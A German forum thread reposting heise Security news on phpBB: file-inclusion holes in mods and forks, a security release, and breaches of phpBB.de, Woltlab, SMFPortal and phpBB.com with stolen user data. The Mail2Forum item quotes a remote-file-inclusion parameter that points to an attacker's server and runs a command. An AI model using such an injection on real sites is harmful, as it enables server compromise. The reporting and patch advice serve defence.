Thema: Erneut kritische Lücke in phpBB

[SiLæncer]

Kritische Lücken in diverser Forensoftware machen derzeit Webserver unsicher. Im Monat Mai wurden auf Sicherheits-Mailinglisten und in einschlägigen Exploit-Sammlungen Advisories und Exploits zum Bulletin-Board tinyBB sowie den phpBB-Mods Activity Mod Plus, Advanced Guestbook, Blend Portal System, foing, Knowledge Base, Nivisec Hacks List, phpbb-Auction, phpRaid und TopList veröffentlicht. In allen Fällen ist es einem Angreifer mit Hilfe der Exploits übers Netz unter Umständen möglich, beliebigen PHP-Code mit Rechten des Webserver-Prozesses ausführen zu lassen, sofern dieser mit der Option register_globals on läuft. Zusätzlich ist es einem Angreifer in tinyBB möglich, sich unter beliebigen Account-Namen ohne Kenntnis eines gültigen Passwortes anzumelden.

Die Schwachstellen finden sich laut den Advisories und Exploits in den genannten Mods bis einschließlich der jeweils aktuellen Version. Auch tinyBB ist demnach bis einschließlich der aktuellen Version 0.3 verwundbar. Die bislang für Activity Mod Plus, Blend Portal System und TopList verfügbaren Patch-Anleitungen sollten Board-Admins bei Verwendung dieser Module unbedingt befolgen. Die genannten Lücken lassen sich in einem Rutsch schließen, wenn der Server-Admin die PHP-Option register_globals off in der Konfigurationsdatei php.ini setzt. Dieses Vorgehen ist bei Shared-Webhosting in der Regel nicht möglich, da es immer noch PHP-Software gibt, die auf register_globals angewiesen ist. In diesem Fall hilft nur, verwundbare Mods selbst zu flicken oder sie zu deinstallieren.

Siehe dazu auch:

    * tinyBB <= 0.3 Multiple Remote Vulnerabilities, Advisory von Mustafa Can Bjorn
    * Patch-Anleitung für Activity Mod Plus und Blend Portal System auf php-tweaks.com
    * phpBB-Module reißen Sicherheitslöcher auf, Meldung von heise Security

Quelle und Links : http://www.heise.de/security/news/meldung/73656

[SiLæncer]

Für das optionale Mail2Forum-Modul der beliebten Forensoftware phpBB ist ein Exploit aufgetaucht, mit dem Angreifer das System kompromittieren können. Ursache des Problems ist die fehlerhafte Verarbeitung des Parameters m2f_root_path in Skripten wie m2f_forum.php, m2f_mailinglist.php und anderen, mit der sich beliebiger PHP-Code ausführen lässt. So kann ein Angreifer den Pfad m2f_root_path auf einen eigenen Server umbiegen (m2f_root_path=http://[server]/cmd.txt?&cmd=ls) und so seinen Schadcode auf dem verwundbaren phpBB-Server ausführen. Wie immer in solchen Fällen lässt sich die Lücke nur ausnutzen, wenn die Option register_globals aktiv ist. Betroffen soll die Version Mail2Forum 1.2 sein. Ein offizieller Patch steht nicht zur Vefügung, Anwender sollten register_globals ausschalten oder den Quellcode des Modul selbst editieren.

Ob diese Lücke auch die Ursache für das Defacement von www.phpBB2.de, den Webseiten des nach eigenen Angaben offiziellen deutschen phpBB2-Supports, darstellt, ist unklar. Seit dem heutigen Dienstagmorgen bekommen Besucher auf der Startseite nur die Meldung "THES SIT HACKED" zu sehen. Interessanterweise ist der Text dabei in Fragmente einer HTML-Seite von Blackhat.com eingebettet, den Webseiten des Veranstalters der bekannten Sicherheitskonferenzen und Schulungen.

Quelle : www.heise.de

[SiLæncer]

Update
Mittlerweile ist phpBB2.de wieder erreichbar. In einer Meldung bestätigen die Betreiber die Vermutung, dass die Lücke im Mail2Forum-Modul Ursache des Defacements war. Das Modul wurde zwar nicht aktiv eingesetzt, war aber nach zurückliegenden Tests in einem Unterverzeichnis von außen noch erreichbar. Das zweite offizielle deutsche phpBB-Support-Forum phpBB.de war von dem Angriff nicht betroffen.

Quelle : www.heise.de

[SiLæncer]

Die phpBB-Entwickler schließen mit der Version 2.0.22 der Forensoftware einige Sicherheitslücken. Zudem gab es noch einige kosmetische Fehlerbereinigungen.

Die Software überprüft jetzt das Upload-Verzeichnis für Avatare genauer. Die Programmierer haben die Filterregeln für Umleitungen (redirection targets) angepasst. Weiterhin haben sie eine Cross-Site-Scripting-Lücke bei der Anzeige von Privatnachrichten geschlossen. Die Forensoftware überprüft jetzt die Gültigkeit der Sitzung in mehreren Formularen.

Die Entwickler empfehlen allen Nutzern, phpBB baldmöglichst zu aktualisieren. Sie weisen außerdem darauf hin, dass der Administrator nach dem Einspielen des Updates auch das Datenbank-Update-Skript ausführen muss, um die Aktualisierung abzuschließen.

Siehe dazu auch:

    * phpBB 2.0.22 released, Ankündigung der neuen phpBB-Version von den Entwicklern
    * Download von phpBB 2.0.22

Quelle und Links : http://www.heise.de/security/news/meldung/82967

[SiLæncer]

Diverse auf phpBB basierende Forensysteme haben die so genannte phpbb_root_path-Schwachstelle geerbt. Ein Hacker namens Mehmet Ince hat in den vergangenen Tagen unter dem Pseudonym Xoron über Mailinglisten bekannt gegeben, dass sich die Lücke in Omegaboard, Cerulean Portal System, phpBB Tweaked, Hailboards, EclipseBB und Xero Portal findet. Für einige Forensysteme sind auch Exploits verfügbar, mit denen es Angreifern unter Umständen möglich ist, auf betroffenen Systemen übers Netz beliebigen Schadcode nachzuladen und zur Ausführung zu bringen.

Einige der Original-Meldungen von Xorox lassen sich nicht ohne Weiteres auffinden, dennoch verweisen Sicherheitsdienstleister wie FrSIRT oder SecurityFocus auf ensprechende Schwachstellen, die er entdeckt haben soll. Die Programmierfehler sollen sich stets in den jeweils aktuellen Versionen der Forensysteme befinden. Über die Verfügbarkeit von Patches ist noch nichts bekannt.

Wer einmal eine Suchmaschine mit einer Anfrage nach "hacked by xoron" bemüht, wird feststellen, dass der Hacker keinesfalls zimperlich mit seinen Exploits umgeht. Unter anderem ist ein Genetik-Forum der TU-Dresden Opfer seiner Defacements geworden. Auch einige der Herstellerseiten der betroffenen Foren, beispielsweise von Cerulean, sind derzeit nicht erreichbar. Ob Letzteres auf die nun verfügbaren Exploits zurückzuführen ist, ist allerdings unklar.

Die phpbb_root_path-Lücke auszunutzen, ist trivial. Selbst wenn kein Exploit verfügbar ist, lassen sich alte Exploits für andere Systeme leicht anpassen oder sogar unverändert anwenden. Betreiber phpBB-basierter Forensysteme sollten ihre Server grundsätzlich absichern. Die wichtigste Methode, einen Exploit der phpbb_root_path-Lücke zu vereiteln, ist die Option register_globals = off in der PHP-Konfigurationsdatei php.ini.

Siehe dazu auch:

    * Omegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit, Advisory von Xoron auf Bugtraq
    * Cerulean Portal System (phpbb_root_path) Remote File Include Exploit, Advisory von Xoron auf Bugtraq
    * Phpbb Tweaked PHPBB_Root_Path Remote File Include Vulnerability, Eintrag in der Fehlerdatenbank von SecurityFocus
    * HailBoards UserCP_ViewProfile.PHP Remote File Include Vulnerability, Eintrag in der Fehlerdatenbank von SecurityFocus
    * EclipseBB Phpbb_Root_Path Remote File Include Vulnerability, Eintrag in der Fehlerdatenbank von SecurityFocus
    * Xero Portal v1.2 (phpbb_root_path) Remote File Include Vulnerablity, Advisory von Xoron auf Bugtraq

Quelle und Links : http://www.heise.de/security/news/meldung/84709

[SiLæncer]

Bei einem Angriff auf das deutsche Support-Forum für die beliebte Open-Source-Foren-Software phpBB ist es bislang Unbekannten offenbar gelungen, Benutzerdaten wie Username, E-Mail und den MD5-Hash des Passwortes auszuspähen. Einer Mitteilung der Forenbetreiber zufolge war keine Sicherheitslücke in phpBB Ursache des Einbruchs, sondern das Zusammenspiel verschiedener Faktoren – welche genau, bleibt indes offen. Möglicherweise wurde gezielt das Konto eines Administrators geknackt. Ein Strafantrag wurde bereits gestellt, daher sollen zunächst keine weiteren Informationen veröffentlicht werden.

Mit Hilfe von Brute-Force-Angriffen oder vorberechneten Rainbow-Tables ist es möglich, vom MD5-Hash auf das Klartext-Passwort zu schließen. Da Nutzer des Forums das gleiche Passwort unter Umständen auf verschiedenen Seiten benutzen, empfehlen die Betreiber von phpBB.de, diese dort so schnell wie möglich zu ändern.

Siehe dazu auch:

    * Benutzerdaten auf phpBB.de ausspioniert, Mitteilung vom phpBB.de-Team

Quelle : http://www.heise.de/newsticker/meldung/102993

[SiLæncer]

[Update]
Der Angriff auf phpBB.de war offenbar kein Einzelfall, auch das Support-Forum von Woltlab ist wohl gehackt worden. Der Täter bietet die Daten auch bereits zum Verkauf, wie ein Screenshots eines Threads auf h4ckyou.org zeigt. Insgesamt bietet er mehr als 125.000 Datensätze an.

Quelle : www.heise.de

[SiLæncer]

Der Einbruch in das deutsche Support-Forum phpBB.de zieht weitere Kreise. Offenbar hat der vermutlich deutsche Täter mit dem Pseudonym Trada auch das Support-Forum SMFPortal.de der Software Simple Machine Forum (SMF) gehackt und die Datensätze von Anwendern ausgelesen. Hinweisen zufolge nutzte er dafür keine Sicherheitslücke, sondern einen gestohlenen FTP-Account.

Laut Meldung auf SMFPortal soll er dabei ein komplettes Backup gezogen haben. Nach Angaben des SMFPortal-Teams sind darin Nutzernamen, E-Mail-Adressen und die Hashes der Zugangspasswörter enthalten gewesen. Die Nutzer werden dazu aufgefordert, ihre Passwörter auf Seiten zu ändern, auf denen sie dasselbe zum Log-in benutzen.

Ob der Täter die Passwörter überhaupt aus den Hashes ermitteln kann, ist fraglich, denn anders als bei phpBB.de nutzt SMF eigentlich Hashes mit Salts, sodass etwa der Angriff mittels vorberechneter Rainbow Tables nicht funktioniert. Allerdings enthielt das Backup auch Private Messages, in denen Nutzer möglicherweise Zugangsdaten im Klartext ausgetauscht haben.

Auch die Daten vom SMFPortal hat der Täter wie schon bei phpBB.de und Woltlab zunächst auf h4ck-y0u.org zum Verkauf angeboten, seine Offerte jedoch aufgrund "des derzeitigen Rummels" wieder zurückgezogen. Bei SMFPortal soll es sich nur um 1400 Datensätze gehandelt haben, während es bei phpBB.de über 80.000 und bei Woltlab über 30.000 gewesen sein sollen. Auch bei Woltlab soll anders als bei phpBB.de keine Sicherheitslücke im Spiel gewesen sein. Zudem nutzt Woltlab zur Speicherung der Passwörter Hashes mit Salt. Bei phpBB.de war dies erst mit der anstehenden Migration auf phpBB 3 geplant.

Alle drei Board-Betreiber haben Strafanzeige erstattet.

Quelle : www.heise.de

[SiLæncer]

Die Webseite der populären Boardsoftware phpBB ist derzeit aufgrund eines Einbruchs nicht zu erreichen. Beim Aufruf erscheint nur der Hinweis, dass jemand durch eine veraltete Version der Newsletter-Management-Software PHPList eingedrungen sei. phpBB.com und dazugehörige Seiten seien bis zur Wiederherstellung nicht zu erreichen. Nach Angaben des Internet Storm Centers (ISC) konnte der Eindringling E-Mail-Adressen und die verschlüsselten Passwörter aller Nutzer auslesen.

Offenbar hat der Angreifer eine seit dem 14. Januar bekannte Local-File-Inclusion-Schwachstelle ausgenutzt, um die Daten auf dem Server auszulesen. Zwar haben die Entwickler von PHPList die Lücke am 29. Januar mit Version 2.0.19 geschlossen. Vermutlich hatte der Angreifer aber bereits zuvor Zugriff auf die Daten. Laut ISC soll er die Daten veröffentlicht haben. Ob er Zugang zum phpBB-Server hatte, ist nicht bekannt.

In phpBB sind nach Angaben der Entwickler keine Lücken bekannt. Zwar ist die Webseite nicht zu erreichen, wer aber die Software herunterladen möchte, kann dies über www.ohloh.net/p/phpbb tun.

Quelle : http://www.heise.de/newsticker/Einbruch-in-Webseite-von-Boardsoftware-phpBB--/meldung/126929

[SiLæncer]

Die PhpBB-Server wurden kompromittiert und sind momentan offline. Die Angreifer haben es geschafft, den Foren-Zugang eines Administrators zu kapern.

Die Webseite der beliebten freien Forensoftware PhpBB ist seit dem Wochenende offline. Die Betreiber des Projektes haben nun mitgeteilt, dass Angreifer es geschafft haben, über den Foren-Zugang eines Administrators in die Server einzusteigen. Downloads der Software seien zu keiner Zeit kompromittiert worden. Allerdings haben es die Angreifer geschafft, die kompletten Datenbanken des phpbb.com-Forums und der Test-Installation area51.phpbb.com zu kopieren.

Laut den Entwicklern wurden nur gesalzene Hashes der Passwörter kopiert. Nutzer sollen sich aber überlegen, ob sie ihre Passwörter bei anderen Seiten nicht aus Vorsicht trotzdem ändern wollen, falls sie das PhpBB-Passwort dort auch benutzt haben. Es sei nicht auszuschließen, dass die Angreifer es irgendwann schaffen, die Hashes zu knacken. Zusätzlich haben die Angreifer bei Logins der Foren zwischen dem 12. und 15. Dezember alle Passwörter im Klartext mitgeschrieben. Nutzer, die sich in diesem Zeitraum angemeldet haben, sollten auf jeden Fall ihre Passwörter ändern.

Momentan setzen die PhpBB-Betreiber nach eigenen Angaben ihre Webserver neu auf. Wenn das abgeschlossen ist, wollen sie weitere Details zu den Angriffen bekanntgeben.

Quelle : www.heise.de